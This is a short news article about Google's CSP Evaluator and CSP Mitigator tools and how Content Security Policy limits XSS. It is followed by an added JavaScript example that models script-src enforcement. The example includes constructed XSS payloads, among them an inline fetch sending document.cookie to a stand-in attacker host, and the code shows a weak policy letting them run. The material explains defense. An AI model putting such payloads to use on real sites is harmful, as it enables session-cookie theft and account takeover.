Google says it paid over $1.2 million just for XSS bugs
Sep 27, 2016 20:30 GMT · By Catalin Cimpanu

Google released two new tools called CSP Evaluator and CSP Mitigator that help security researchers identify weaknesses that are often exploited to launch XSS attacks.
Both tools revolve around CSP, or Content Security Policy, a security mechanism supported by all major browsers, although each browser implements it somewhat differently.
CSP is a set of rules, delivered to the browser in the Content-Security-Policy response header, that lets developers restrict which scripts and other resources a page is allowed to load and execute. When attackers find a way to inject HTML into a vulnerable application, the browser enforces the policy and refuses to run injected scripts or load other injected resources that the policy does not allow. The protection is only as good as the policy, however: if the source list permits inline scripts or allows loading from anywhere, the injected payload is allowed too, and the policy offers little defense.
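To make the mechanism concrete, the following is an added example (not code from the article, and not part of Google's CSP Evaluator or CSP Mitigator) that models in simplified form how a browser applies a policy's script-src directive to a script found in the page. It parses a Content-Security-Policy header, falls back to default-src when script-src is absent, honours 'none', 'self', 'unsafe-inline', nonces, scheme sources such as https: and host sources with a leading wildcard, and then checks two constructed attacker payloads against a weak and a strict policy. The page origin, policies, nonce and payloads are all hypothetical values constructed for the example; hashes and 'strict-dynamic' are not modelled.

```javascript
// Added example: a simplified model of CSP script-src enforcement.
// Not from the article or from Google's CSP tools; policies, origin and
// payloads below are constructed for illustration.

// Parse "name src src; name src" into a Map of directive name -> [sources].
// As in the spec, a repeated directive is ignored and the first one wins.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!directives.has(key)) directives.set(key, sources);
  }
  return directives;
}

// Does one source expression match the URL of an external script?
// Handles 'self', *, scheme sources (https:), host sources and *.host wildcards.
function hostMatches(source, url, pageOrigin) {
  if (source === "'self'") return url.origin === pageOrigin;
  if (source.startsWith("'")) return false;          // other keywords never match a URL
  if (source === '*') return true;
  if (source.endsWith(':')) return url.protocol === source;   // e.g. https:
  // A host source without a scheme inherits the page's scheme (simplified).
  const pattern = source.includes('://') ? source : `${url.protocol}//${source}`;
  let parsed;
  try { parsed = new URL(pattern.replace('*.', 'wildcard.')); } catch (e) { return false; }
  if (parsed.protocol !== url.protocol) return false;
  if (source.includes('*.')) {
    const suffix = parsed.hostname.replace(/^wildcard\./, '');
    return url.hostname.endsWith('.' + suffix);
  }
  return parsed.hostname === url.hostname && parsed.port === url.port;
}

// script: { src?: string, inline?: string, nonce?: string }
// Returns true if the browser would execute the script under this policy.
function scriptAllowed(header, script, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy.get('script-src') || policy.get('default-src');
  if (!sources) return true;                         // no policy covers scripts at all
  if (sources.includes("'none'")) return false;
  if (script.inline !== undefined) {
    // 'unsafe-inline' is ignored once the list contains a nonce or hash (CSP Level 2).
    const hasNonceOrHash = sources.some(s => /^'(nonce|sha256|sha384|sha512)-/.test(s));
    if (sources.includes("'unsafe-inline'") && !hasNonceOrHash) return true;
    // Injected markup cannot carry the per-response nonce, so it fails here.
    return script.nonce !== undefined && sources.includes(`'nonce-${script.nonce}'`);
  }
  const url = new URL(script.src, pageOrigin);
  return sources.some(s => hostMatches(s, url, pageOrigin));
}

// Constructed scenario: the page origin, one weak and one strict policy,
// and two payloads as an attacker would inject them through an HTML injection bug.
const PAGE = 'https://shop.example';
const WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";
const STRICT_POLICY =
  "default-src 'none'; script-src 'self' 'nonce-r4nd0m' https://cdn.example.com; object-src 'none'";
const INJECTED_INLINE = { inline: 'fetch("https://attacker.example/?c=" + document.cookie)' };
const INJECTED_REMOTE = { src: 'https://attacker.example/x.js' };

function demo() {
  return {
    weakInline: scriptAllowed(WEAK_POLICY, INJECTED_INLINE, PAGE),     // 'unsafe-inline' lets it run
    weakRemote: scriptAllowed(WEAK_POLICY, INJECTED_REMOTE, PAGE),     // https: allows any host
    strictInline: scriptAllowed(STRICT_POLICY, INJECTED_INLINE, PAGE), // no nonce, blocked
    strictRemote: scriptAllowed(STRICT_POLICY, INJECTED_REMOTE, PAGE), // host not listed, blocked
    legitNonce: scriptAllowed(STRICT_POLICY, { inline: 'init()', nonce: 'r4nd0m' }, PAGE),
    legitCdn: scriptAllowed(STRICT_POLICY, { src: 'https://cdn.example.com/app.js' }, PAGE),
  };
}

console.log(demo());
```

The weak policy illustrates the point in the paragraph above: it is a valid CSP that the browser enforces faithfully, yet both injected payloads are allowed because 'unsafe-inline' and the bare https: scheme source admit attacker-controlled content. The strict policy blocks both while still letting the page's own nonced inline script and its CDN script run. Real browsers implement considerably more of the specification than this model (hashes, 'strict-dynamic', path matching, port defaults), so treat it as an aid to reading policies, not as a validator.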